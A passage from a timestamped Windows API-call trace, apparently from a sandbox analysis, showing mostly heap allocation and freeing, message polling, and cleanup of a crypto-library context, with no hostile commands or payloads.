out: hHeap=0x970000) returned 1 [0267.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0267.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0267.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0267.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0267.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0267.771] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0267.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0267.771] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0267.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0267.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.771] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0267.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0267.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0267.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0267.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0267.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0267.772] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0267.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0267.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0267.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0267.773] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0267.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0267.774] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0267.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0267.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51880 [0267.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0267.774] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0267.774] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0267.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0267.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.774] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0267.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0267.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0267.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0267.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0267.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0267.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0267.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0267.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0267.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515c8 [0267.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0267.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0267.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0267.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0267.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0267.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0267.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0267.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0267.775] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0267.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.775] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0267.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0267.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0267.775] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0267.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0267.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0267.776] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0267.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0267.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0267.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0267.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0267.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0267.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0267.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0267.776] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0267.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0267.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0267.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0267.776] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0267.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.776] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0267.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0267.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0267.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0267.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0267.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0267.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0267.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0267.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0267.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0267.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0267.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0267.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0267.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0267.777] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0267.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0267.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0267.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.777] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0267.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0267.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0267.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0267.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0267.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0267.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0267.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0267.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0267.778] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0267.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0267.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0267.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0267.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0267.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0267.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0267.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 